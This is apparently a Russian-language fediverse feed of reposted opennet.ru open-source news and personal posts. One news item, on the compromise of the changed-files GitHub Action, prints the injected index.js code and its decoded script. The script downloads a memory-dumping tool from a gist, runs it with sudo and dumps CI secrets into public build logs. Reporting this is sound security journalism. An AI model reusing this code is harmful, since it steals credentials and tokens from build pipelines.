Выпуск Cygwin 3.6.0, GNU-окружения для Windows Основные изменения:
Источник: https://www.opennet.ru/opennews/art.shtml?num=62903
Началось бета-тестирование Fedora Linux 42 Наиболее значимые изменения в Fedora Linux 42:
Предложенный интерфейс избавлен от усложнений и более понятен для начинающих пользователей. В качестве базового предлагается использовать автоматизированный (guided) режим разбивки диска, при котором инсталлятор сам выбирает параметры создания или изменения разделов на основе настроек, выбранных пользователем. Добавлена опция для переустановки дистрибутива (например, для восстановления работы при повреждении каких-то системных файлов), а также возможность установки в режиме двойной загрузки для использования на одном компьютере нескольких ОС.
Одновременно объявлено о бета-тестировании дистрибутива Fedora Asahi Remix 42, предназначенного для установки на компьютеры Mac, оснащённые ARM-чипами, разработанными компанией Apple. Fedora Asahi Remix 42 основан на пакетной базе Fedora Linux 42-beta и оснащён инсталлятором Calamares. Обеспечена возможность работы на системах Apple MacBook Air, MacBook Pro, Mac Mini, Mac Studio и iMac, оснащённых ARM-чипами Apple M1
и M2.
В Fedora Asahi полностью поддерживаются: звуковая подсистема компьютеров Apple, камера, Wi-Fi, Bluetooth, устройства ввода, USB Type C (USB 3.0) и беспроводная зарядка MagSafe. Пока не поддерживается: подключение экрана через USB-C, Thunderbolt/USB4, микрофон и
Touch ID. В графических драйверах поддерживается OpenGL 4.6, OpenGL ES 3.2 и Vulkan 1.4. Для запуска приложений, собранных для систем x86_64, задействован инструментарий muvm и слой эмуляции на базе пакета FEX.
Источник: https://www.opennet.ru/opennews/art.shtml?num=62902
contrinitiator
bonked 18 Mar 2025 14:20 +0100
original: coolingfan375@mastodon.social
<< Как мне объяснили, при отсутствии сведений в базе данных МВД (штрафы по линии ГАИ, уклонение от уплаты налогов и проч.) отыскать человека не так и просто. Причём я сам видел, как других прохожих система видеомониторинга быстро идентифицировала: появлялись фотография, Ф. И. О. и другие персональные данные, — отмечает автовладелец. >>
Vulkan стал официальным графическим API платформы Android. Третий бета-выпуск Android 16 В настоящее время ведётся работа по переводу Android на новый унифицированный стек отрисовки, базирующийся на Vulkan. В контексте разработки игр Google считает, что перевод разработки на Vulkan позволит более эффективно использовать возможности и производительность GPU, например в играх можно будет создавать продвинутые визуальные эффекты и задействовать такую функциональность, как трассировка лучей.
Vulkan поддерживается в Android начиная с 2016 года (Android 7.0), но активное продвижение данного графического API началось только недавно, так как ранее лишь небольшой процент устройств был пригоден для работы с Vulkan. Сейчас ситуация изменилась и по данным Google число находящихся в обиходе устройств, поддерживающих Vulkan, достигло 85%.
Поддержка OpenGL ES в будущих выпусках будет обеспечена через прослойку ANGLE, работающую поверх Vulkan. В этом году реализация OpenGL ES на базе ANGLE будет активирована по умолчанию, а следующем году останется единственно поддерживаемой. В выпуске Android 16, запланированном на второй квартал 2025 года, некоторые новые устройства будут переведены на использование ANGLE для игр и приложений, проверенных и помещённых в белый список.
В Android 17 на ANGLE будут переведены все новые устройства и большинство приложений (вместо белого списка будет задействован чёрный список с приложениями, в которых возникли проблемы). Требования по переходу на ANGLE будут действовать только для новых устройств, изначально выпускаемых на базе Android 16 или Android 17 (на устройства, обновившие прошивку до новых веток требования не распространяются).
Для достижения целостной поддержки Vulkan на устройствах компания Google ввела систему профилей Vulkan (VPA - Vulkan Profiles for Android), определяющих минимально необходимые возможности Vulkan, которое устройство должно поддерживать для прохождения сертификации в Google и задействования новых релизов Android. Например, VPA для Android 16 предписывает поддержку базовых возможностей Vulkan 1.3, а VPA для Android 17 будет требовать поддержки Vulkan 1.4. Если устройство не будет соответствовать требованиям профиля, то на нём невозможно будет использовать новые ветки Android.
Дополнительно можно отметить публикацию третьей бета-версии открытой мобильной платформы Android 16. Для оценки новых возможностей платформы предложена программа предварительного тестирования. Сборки прошивки подготовлены для устройств Pixel 6/6a/6 Pro, Pixel 7/7a/7 Pro, Pixel 8/8a/8 Pro, Pixel 9/9 Pro/9 Pro XL/9 Pro Fold, Pixel Fold и Pixel Tablet.
Среди изменений в Android 16 Beta 3:
Источник: https://www.opennet.ru/opennews/art.shtml?num=62900
continue
bonked 18 Mar 2025 09:43 +0100
original: miraikumiko@cr8r.gg
Представьте что вы находитесь поздней ночью в поликлинике ждущим когда врач закончит с последним пациентом. За окном — чернота. В самом здании тишина. Вы сидите за телефоном и вдруг начинаете вслушиваться в жужжание белых ламп, что над вами. Со временем звук становится всё яснее. Ваше сознание растворяется в нём становясь одним целым с поликлиникой.
contrinitiator
honked 17 Mar 2025 19:05 +0100
Писание говорит, что есть петух, голова которого до небес, а море по колено. Когда солнце омывается в Океане, тогда Океан зашумит, и волны начнут бить петуха по перьям. Петух же, почувствовав волны, скажет: «Кукареку»... Когда он запоет, тогда и все петухи прокричат одновременно по всей вселенной.
contrinitiator
honked back 17 Mar 2025 17:57 +0100
in reply to: https://honk.any-key.press/u/contrinitiator/h/9RMv4H2711SX1F7VX5
Так дальше.
contrinitiator
honked 17 Mar 2025 17:57 +0100
contrinitiator
honked back 17 Mar 2025 15:23 +0100
in reply to: https://mastodon.social/users/cunyxa/statuses/114178213813070759
contrinitiator
honked back 17 Mar 2025 15:12 +0100
in reply to: https://mastodon.social/users/cunyxa/statuses/114178175653508828
contrinitiator
honked 17 Mar 2025 15:11 +0100
«Ленинградец» в целом сохранил свой профиль, но вместо костров с запечённой в углях картошкой теперь детей там ждёт часовня с молитвами.
contrinitiator
honked back 17 Mar 2025 15:10 +0100
in reply to: https://mastodon.social/users/cunyxa/statuses/114178169375604842
@cunyxa @coolingfan375 Уверен, что бражку можно из любого делать. Кажется, даже видал на ютубе ролик.
contrinitiator
bonked 17 Mar 2025 15:10 +0100
original: continue@honk.any-key.press
Вчера прокурорские приходили в книжный магазин «Фаланстер». Наверняка по доносу - мир не без добрых и бдительных людей.
В каналах профессиональных любителей карающего начальства пишут – «нарушений столько, что без последствий не обойдется». Ну и разворачивают травлю Бори Куприянова, создателя и директора магазина, моего доброго друга.
На самом деле, ничего запрещенного не нашли, но изъяли под расписку «Надзирать и наказывать» Мишеля Фуко, а также книги Арендт, Беньямина и Зонтаг.
«Просвещаются», - шутит Боря.
contrinitiator
honked back 17 Mar 2025 15:08 +0100
in reply to: https://mastodon.social/users/cunyxa/statuses/114178152419693650
Вчера прокурорские приходили в книжный магазин «Фаланстер». Наверняка по доносу - мир не без добрых и бдительных людей.
В каналах профессиональных любителей карающего начальства пишут – «нарушений столько, что без последствий не обойдется». Ну и разворачивают травлю Бори Куприянова, создателя и директора магазина, моего доброго друга.
На самом деле, ничего запрещенного не нашли, но изъяли под расписку «Надзирать и наказывать» Мишеля Фуко, а также книги Арендт, Беньямина и Зонтаг.
«Просвещаются», - шутит Боря.
contrinitiator
honked back 17 Mar 2025 15:04 +0100
in reply to: https://silverbay.space/users/multed/statuses/114178133184228731
@multed Это было в стихийном парке Заросли на Васильевском острове (СПб). Там собираются проложить автомагистраль, поэтому активисты собираются на субботники, ну и всякую всячину.
contrinitiator
honked back 17 Mar 2025 14:47 +0100
in reply to: https://mastodon.social/users/coolingfan375/statuses/114178075582157465
contrinitiator
honked 17 Mar 2025 14:34 +0100
На встрече прошёл мастер-класс по «партизанскому» садоводству или сидбомбингу. Желающих учили, как делать «бомбочки» из семян дикорастущих растений и биогумуса. Предполагается, что потом их можно бросить в землю — и на этом месте вскоре появятся растения.
continue
bonked 17 Mar 2025 13:10 +0100
original: tombzz@mastodon.social
Представлен TinyKVM для виртуализации на уровне отдельных процессов TinyKVM рассчитан на изолированный запуск любых консольных программ для Linux с производительностью, близкой к обычному выполнению. Накладные расходы на вызов каждого системного вызова составляют около 2 микросекунд. В качестве примера применения проекта упоминается дополнительная изоляция процессов в системах кэширования и обработки web-запросов. TinyKVM разработан для замены эмулятора libriscv, применяемого для изоляции обработки каждого web-запроса в платформе Varnish. Дополнительно создан вариант библиотеки libvmod, позволяющий выполнять модули к Varnish с использованием TinyKVM.
При запуске при помощи TinyKVM машинный код программ выполняется без эмулирующих прослоек на CPU и ограничивается при помощи API гипервизора KVM, что позволяет исключить накладные расходы и добиться производительности близкой к выполнению без виртуализации. Основные возможности TinyKVM:
Гостевое окружение TinyKVM образует урезанное ядро, защищённого от изменений, собранное с включением зашиты страниц памяти и использующее инструкции SMAP (Supervisor Mode Access Prevention) и SMEP (Supervisor Mode Execution Prevention) для дополнительной изоляции между ядром и пространством пользователя. Ядро использует большие страницы памяти (4k, hugepage) для повышения производительности. Вызываемые программами системные вызовы перехватываются эмулятором и перенаправляются в хост-окружение (задержка на обработку и трансляцию эмулируемого вызова составляет около 2 микросекунд). В самой виртуальной машине не используются какие-либо драйверы, ввод/вывод и виртуальные устройства.
Источник: https://www.opennet.ru/opennews/art.shtml?num=62898
continue
bonked 17 Mar 2025 10:05 +0100
original: sn4il@blog.sn4il.site
Таки прошу прощения за суету, но thedroth.rocks будет закрыт к концу апреля. Ни времени, ни желания у меня не остаётся сейчас, а скоро будет ещё меньше.
Всем рекомендую задонатить
@vlnst@shitpost.poridge.club и пользоваться его замечательным bloat.cat
А я закончил с публичными сервисами.
@Russia@3zi.ru
Релиз графического редактора GIMP 3.0.0 При подготовке следующих выпусков решено перейти на более предсказуемый и частый график публикации новых стабильный веток. В дальнейшем разработчики не будут пытаться разом продвигать множество существенных изменений, а постараются уделить внимание оттачиванию отдельных новых возможностей. Следующую значительную ветку GIMP 3.2 планируют опубликовать примерно через год. В промежутке между значительными выпусками будут выпускаться корректирующие обновления с исправлением ошибок.
Среди наиболее значимых улучшений в GIMP 3.0:
Источник: https://www.opennet.ru/opennews/art.shtml?num=62897
continue
bonked 16 Mar 2025 19:45 +0100
original: FediFollows@social.growyourown.services
Special shoutout to the repair site iFixit who are now on the Fediverse, you can follow them at: ➡️ @iFixit They provide repair forums and free repair guides for phones, computers, consoles, kitchen equipment, tools, medical devices, cars etc. They also review and tear down new gadgets to see how repairable they are. Repairing your existing stuff is much, much better for the environment than buying replacements. #Repairs #Electronics #DIY #Environment #Gadgets #Tech #RightToRepair
continue
bonked 16 Mar 2025 18:48 +0100
original: horhik@mastodon.ml
Наткнулся сейчас на чудесную помесь даба и фри джаза вдохновленную, на удивление, альбомом Brian Eno.... в общем в описании все прочтете :) https://africanheadcharge.bandcamp.com/album/my-life-in-a-hole-in-the-ground Подмечу только, что, когда включил, понял, что этот альбом Eno я уже слушал, причем в тот момент когда он был у меня закачан на кнопочную нокию и я по утрам под него, оказывается, бегал. Хотя до сих пор мне больше запомнился Fractal Zoom, но и этот альбом похоже побывал в ушах.
https://sxmo.org/docs/gettingstarted/ (#sxmo)
We now have a short "getting started" page featuring nice gesture videos made by magdesign. These demo gestures to newcomers so they can quickly and visually grasp how Sxmo works and get going with it. It came to our attention at FOSDEM that this was something that people struggled with when they start out:
Выпуск дистрибутива SystemRescue 12.0 В новом выпуске обеспечена поддержка файловой системы Bcachefs. Обновлена версия редактора разделов GParted 1.7, в которой появилась поддержка Bcachefs. Ядро Linux обновлено до ветки 6.12 (ранее поставлялась ветка 6.6). Добавлены новые версии nwipe 0.38 и dump 0.4b49.
Источник: https://www.opennet.ru/opennews/art.shtml?num=62894
Выпуск дистрибутива Debian 12.10. Первая стадия заморозки Debian 13 Из изменений в Debian 12.10 можно отметить обновление до свежих стабильных версий пакетов bup, intel-microcode, mariadb, postgresql-15, spamassassin, systemd и tzdata. Удалены пакеты kanboard
и libnet-easytcp-perl, оставшиеся без сопровождения и имеющие проблемы с безопасностью, а также пакет
looking-glass, признанный непригодным для стабильного выпуска.
Для загрузки и установки "с нуля" подготовлены установочные сборки c Debian 12.10. Системы, установленные ранее и поддерживаемые в актуальном состоянии, получают обновления, присутствующие в Debian 12.10, через штатную систему установки обновлений. Исправления проблем безопасности, включённые в новые выпуски Debian, доступны пользователям по мере выхода обновлений через сервис security.debian.org.
Дополнительно можно отметить перевод на первую стадию заморозки пакетной базы ветки Debian 13 "Trixie". На первой стадии заморозки прекращено выполнение "transitions" (обновление пакетов, требующее корректировки зависимостей у других пакетов, которое приводит к временному удалению пакетов из Testing), а также прекращено обновление пакетов, необходимых для сборки (build-essential).
15 апреля 2025 года состоится мягкая заморозка пакетной базы, при которой будет прекращён приём новых исходных пакетов и закрыта возможность повторного включения ранее удалённых пакетов.
15 мая 2025 года будет применена жёсткая заморозка перед релизом, при которой процесс переноса ключевых пакетов и пакетов без autopkgtests из ветки unstable в testing будет полностью остановлен и начнётся этап интенсивного тестирования и исправления блокирующих релиз проблем.
Через некоторое время после жёсткой заморозки будет проведена полная заморозка, охватывающая все пакеты. Релиз Debian 13 ожидается во второй половине 2025 года.
Источник: https://www.opennet.ru/opennews/art.shtml?num=62893
Мэйнтейнер Dash to Panel сложил полномочия после критики манеры сбора пожертвований Объявление об уходе Чарльза спровоцировала негативная реакция сообщества на попытки собрать пожертвования, которые были восприняты как слишком назойливые и агрессивные. Чарльз закрепил в панели на первом месте в области ярлыков приложений анимированную кнопку с изображением красного сердца, при нажатии на которую появлялось сообщение о сборе пожертвований. Закрыть сообщение можно было только после истечения 20-секундного обратного отчёта. В контекстное меню была добавлена секция "Параметры пожертвования", но они не позволяли сразу убрать кнопку (опция для скрытия кнопки появлялась через какое-то время).
Недовольство вызвало то, что кнопка занимает первое место в панели (смещает горячую клавишу для вызова первого ярлыка), отвлекает назойливой анимацией и отнимает время на ожидание возможности скрытия. Один из участников обсуждения поставил вопрос: насколько можно доверять проекту, ключевой разработчик которого позволяет себе подобное неуважение к пользователям. В ответ Чральз не стал убирать кнопку, а лишь переместил её в конец списка.
К обсуждению подключился Джейсон ДеРоуз, основатель проекта, отошедший от разработки в 2021 году, который написал, что реализованная навязчивая реклама противоречит духу созданного им проекта. Отмечается, что проект существует благодаря вкладу многих людей, как тех что непосредственно участвовали в разработке Dash to Panel, так и тех, что развивают системы на которых работает панель и с которыми она взаимодействует. Джейсон предложил представить ситуацию, в которой каждый компонент дистрибутива начнёт закреплять собственный надоедливый постоянной висящий экран сбора пожертвований. По мнению создателя Dash to Panel, если Чарльз достиг точки недовольства и чувствует приближение выгорания, стоит предложить сообществу подхватить эстафету сопровождения, а не пытаться использовать раздражающие сомнительные методы для возвращения собственной мотивации.
Чарльз ответил, что он всё ещё получает удовольствие от работы над Dash to Panel, но к сожалению не может уделять разработке столько времени, сколько ему бы хотелось. По словам Чарльза он посчитал, что сбор пожертвований поможет решить эту проблему, но похоже был не прав и поэтому удалил все запросы пожертвований и начнёт искать себе замену как мэйнтейнеру.
Источник: https://www.opennet.ru/opennews/art.shtml?num=62888
Компрометация GitHub Actions-обработчика changed-files, применяемого в 23 тысячах репозиториях В репозиторий changed-files было подставлено изменение 0e58ed8, добавляющее в файл index.js вредоносный код под предлогом переработки работы с файлами блокировок. При выполнении обработчика changed-files вредоносная вставка извлекала из процесса Runner Worker ключи доступа и прочие конфиденциальные данные. В качестве канала для передачи информации за пределы сборочного окружения использовался вывод записей в сборочный лог, который не в приватных репозиториях доступен публично.
Всем разработчикам, пользовавшимся changed-files, требуется незамедлительно провести аудит своей инфраструктуры и проверить публичные логи систем интеграции на базе GitHub Actions на предмет утечки конфиденциальных данных. В случае использования скомпрометированной версии рекомендуется поменять ключи и провести анализ возможной компрометации своих систем. В настоящее время GitHub уже заблокировал репозиторий changed-files, но до этого около 14 часов вредоносные обновления были доступны для загрузки. Понять наличие вредоносного изменения можно по упоминанию "bash" в файле index.js:
Коммит был размещён от имени бота "renovate[bot]", предназначенного для автоматизации операций по обновлению зависимостей, но скорее всего имя данного бота использовано для запутывания следов, так как коммит был помечен как неверифицированный и не принадлежащий ни к одной ветке в репозитории changed-files. Подобные коммиты могут свидетельствовать о добавлении не в основной репозиторий, а в его форк (при прямом обращении через основной репозиторий в GitHub коммиты из форков остаются видимыми).
Примечательно, что атакующий добился добавления вредоносного коммита почти во все git-тэги и релизы проекта changed-files, без отображения в git-логе коммитов в соответствующих ветках. В качестве предположений как он мог этого добиться упоминалось создание форка репозитория, размещения в нём вредоносного кода и обновления всех тегов в родительском репозитории с учётом нового SHA-хэша форка. По предположению другого разработчика атакующий добавил коммит в ветку main, перенаправил все теги на данную ветку, после чего откатил ветку main на предыдущий коммит.
async function updateFeatures(token) {
const {stdout, stderr} = await exec.getExecOutput('bash', ['-c', `echo "aWYgW1sgIiRPU1...ApmaQo=" | base64 -d > /tmp/run.sh && bash /tmp/run.sh`], {
ignoreReturnCode: true,
silent: true
});
core.info(stdout);
}
В base64-последовательности содержался код:
if [[ "$OSTYPE" == "linux-gnu" ]]; then
B64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0 | base64 -w 0`
echo $B64_BLOB
else
exit 0
fi
Источник: https://www.opennet.ru/opennews/art.shtml?num=62892
В KDE реализован график для оценки скорости копирования файлов В ветке KDE Frameworks 6.13 реализована поддержка прокрутки в диалогах сохранения или открытия файлов, используя экранные жесты.
В кодовой базе, на основе которого будет сформирован выпуск KDE Plasma 6.3.4, элементы интерфейса, реализованные в стиле боковых панелей, такие как Activity Switcher, теперь перекрывают обычные горизонтальные панели (если в панели не активен режим редактирования).
Источник: https://www.opennet.ru/opennews/art.shtml?num=62890
continue
bonked 15 Mar 2025 10:50 +0100
original: opennet@honk.any-key.press
GitHub принудительно перевёл репозитории проекта Organic Maps в архивный режим Ситуация в целом аналогична ситуации с блокировкой репозиториев проекта ipmitool два года назад, в результате которой мейнтейнеру пришлось срочно мигрировать на платформу Codeberg. В том случае блокировка проекта была связана с блокировкой аккаунта мейнтейнера, который работает в компании, попавшей под санкции.
Проект Organic Maps развивает бесплатное приложение для автономной навигации, использующее картографические данные из OpenStreetMap. Код проекта распространяется под лицензией Apache 2.0. Organic Maps делает упор на конфиденциальность, поскольку не отслеживает местоположение пользователя и не собирает личные данные. Проект основан как форк приложения MAPS.ME, созданный его изначальными авторами после продажи MAPS.ME компании mail.ru и переводу на проприетарную модель разработки.
Источник: https://www.opennet.ru/opennews/art.shtml?num=62887
Доступен графический тулкит GTK 4.18 Среди наиболее заметных улучшений в GTK 4.18:
Спустя два часа после выпуска GTK 4.18.0 сформировано корректирующее обновление 4.18.1, в котором устранена проблема в наборе тестов (забыли убрать привязку к экспериментальной ветке 4.17).
Источник: https://www.opennet.ru/opennews/art.shtml?num=62889
contrinitiator
bonked 15 Mar 2025 08:53 +0100
original: strizhechenko@lor.sh
Пообщался с техподдержкой Билайна о персональных данных. Интересно, сколько данных реально удалится после этой заявки? ====== Мы прекратим обработку ваших персональных данных, если пожелаете, за исключением обработки персональных данных для целей исполнения договора. Если вы хотите, чтобы ВымпелКом полностью прекратил обработку ваших персональных данных, тогда вам нужно расторгнуть договор оказания услуг связи. Отмечаем, что ВымпелКом будет продолжать обработку ваших персональных данных в период действия договора об оказании связи и в течение 5 лет после расторжения договора в соответствии с требованием законодательства. По истечении сроков, предусмотренных законом обработка ваших персональных данных будет прекращена, персональные данные уничтожены. ------ То есть я уже сейчас могу пожелать прекращение обработки всех данных кроме тех, что нужны для исполнения договора? Желаю :) ------ Составила заявку ХХХХХХ для отключения обработки ваших данных (кроме договора), она будет рассмотрена в течение 48 часов.
После рассмотрения вам поступит обратная связь :)
GitHub принудительно перевёл репозитории проекта Organic Maps в архивный режим Ситуация в целом аналогична ситуации с блокировкой репозиториев проекта ipmitool два года назад, в результате которой мейнтейнеру пришлось срочно мигрировать на платформу Codeberg. В том случае блокировка проекта была связана с блокировкой аккаунта мейнтейнера, который работает в компании, попавшей под санкции.
Проект Organic Maps развивает бесплатное приложение для автономной навигации, использующее картографические данные из OpenStreetMap. Код проекта распространяется под лицензией Apache 2.0. Organic Maps делает упор на конфиденциальность, поскольку не отслеживает местоположение пользователя и не собирает личные данные. Проект основан как форк приложения MAPS.ME, созданный его изначальными авторами после продажи MAPS.ME компании mail.ru и переводу на проприетарную модель разработки.
Источник: https://www.opennet.ru/opennews/art.shtml?num=62887
continue
bonked 15 Mar 2025 06:52 +0100
original: strizhechenko@lor.sh
Пообщался с техподдержкой Билайна о персональных данных. Интересно, сколько данных реально удалится после этой заявки? ====== Мы прекратим обработку ваших персональных данных, если пожелаете, за исключением обработки персональных данных для целей исполнения договора. Если вы хотите, чтобы ВымпелКом полностью прекратил обработку ваших персональных данных, тогда вам нужно расторгнуть договор оказания услуг связи. Отмечаем, что ВымпелКом будет продолжать обработку ваших персональных данных в период действия договора об оказании связи и в течение 5 лет после расторжения договора в соответствии с требованием законодательства. По истечении сроков, предусмотренных законом обработка ваших персональных данных будет прекращена, персональные данные уничтожены. ------ То есть я уже сейчас могу пожелать прекращение обработки всех данных кроме тех, что нужны для исполнения договора? Желаю :) ------ Составила заявку ХХХХХХ для отключения обработки ваших данных (кроме договора), она будет рассмотрена в течение 48 часов.
После рассмотрения вам поступит обратная связь :)
Microsoft по ошибке удалил дополнения к VSCode, насчитывающие 9 млн установок Представители Microsoft принесли извинения пострадавшему разработчику и признались, что поторопились, пытаясь оперативно защитить пользователей от возможной угрозы, положившись на срабатывание нескольких детекторов вредоносного ПО в коде. Для снижения вероятности подобных инцидентов в будущем компания Microsoft
пересмотрит свою политику в отношении обфусцированного кода, а также обновит системы сканирования и процесс ручного анализа.
Дополнения заподозрили в распространении вредоносного кода из-за наличия обфусцированных вставок, на которые обратили внимание сотрудники компании ExtensionTotal, развивающей AI-инструменты для сканирования вредоносных дополнений к VSCode. В Microsoft была направлена жалоба с подозрениями на использование в дополнениях "Material Theme" и "Material Theme Icons" обфусцированных вставок для скрытия вредоносного кода.
Например, в файле release-notes.js был выявлен обфусцированный исполняемый код, в то время как темы оформления должны содержать лишь статические JSON-данные. Частичное раскодирование обфусцированных блоков показало наличие строк с именами пользователей и паролями. В ответ на жалобу исследователи безопасности из Microsoft провели проверку, которая подтвердила упомянутые в жалобе выводы. Наличия исполняемого кода в темах оформления и упоминаний паролей было признано достаточным для удаления дополнений и блокировки их автора.
Сразу после блокировки автор дополнений опубликовал возражение против действий Microsoft и заявил, что в его проектах нет вредоносного кода, а наличие обфусцирования не является поводом для удаления. Единственной проблемой было то, что в обфусцированный блок попал код клиента из SDK sanity.io, в котором имелись строки, упоминающие логины и пароли в клиенте аутентификации. Данный код попал в состав дополнения по недосмотру из-за старого сборочного скрипта, применявшегося для генерации файлов в формате JSON после загрузки SVG-пиктограмм из закрытого репозитория.
По словам автора дополнений, если бы Microsoft сообщала ему о проблеме, он устранил бы её в считанные секунды, но вместо этого компания без предупреждений и уведомлений заблокировала дополнения и учётную запись. На то чтобы добиться восстановления ошибочно удалённых дополнений потребовалось две недели.
Источник: https://www.opennet.ru/opennews/art.shtml?num=62885